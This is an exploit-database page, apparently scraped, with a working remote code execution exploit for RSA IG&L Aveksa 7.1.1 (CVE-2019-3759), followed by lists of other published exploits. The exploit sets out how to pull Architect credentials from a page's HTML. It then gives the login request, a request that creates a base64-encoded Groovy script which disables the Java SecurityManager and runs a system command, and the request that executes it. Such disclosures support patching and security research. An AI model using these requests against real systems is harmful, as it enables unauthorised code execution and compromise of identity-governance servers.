Menu

Search for hundreds of thousands of exploits

"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"

Author

Exploit author

"Jakub Palaczynski"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-06

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution
# Date: 2019-04-16
# Exploit Author: Jakub Palaczynski, Lukasz Plonka
# Vendor Homepage: https://www.rsa.com/
# Version: 7.1.1, prior to P02 
# CVE : CVE-2019-3759

# (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi)

Information:
Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution.

1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request:
https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false
search for "<IFRAME" in source of HTML and note username and password

2. Log into Architect. Sample request:
POST /aveksaWFArchitect/auth/login/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 146
Cookie: JSESSIONID=session
Connection: close

{"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}}

3. Creating new script that bypasses Java Security Policy and runs "id" system command.
* "statementText" - contains base64-encoded Groovy code
* "name" (at the end) - script name that must be unique
* Save "scriptId" from the response as it is necessary for next request.
POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 733
Cookie: JSESSIONID=session
Connection: close

{"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"}

4. Running created script:
* In the response you have result of your command
PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 58
Cookie: JSESSIONID=session
Connection: close

{"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2020-07-06 "RSA IG&L Aveksa 7.1.1 - Remote Code Execution" webapps multiple "Jakub Palaczynski"
2019-10-07 "CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation" local windows "Jakub Palaczynski"
2019-10-07 "IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload" webapps java "Jakub Palaczynski"
2019-05-21 "Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution" webapps java "Jakub Palaczynski"
2018-11-05 "Royal TS/X - Information Disclosure" webapps json "Jakub Palaczynski"
2018-10-31 "Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution" webapps php "Jakub Palaczynski"
2018-09-17 "CA Release Automation NiMi 6.5 - Remote Command Execution" remote java "Jakub Palaczynski"
2017-12-13 "Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read" webapps cgi "Jakub Palaczynski"
2017-09-13 "Astaro Security Gateway 7 - Remote Code Execution" remote hardware "Jakub Palaczynski"
2016-10-20 "Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection" webapps xml "Jakub Palaczynski"
2015-06-10 "HP WebInspect 10.4 - XML External Entity Injection" webapps xml "Jakub Palaczynski"
2014-12-12 "IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution" webapps jsp "Jakub Palaczynski"
2014-12-10 "Apache James Server 2.3.2 - Remote Command Execution" remote linux "Jakub Palaczynski" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected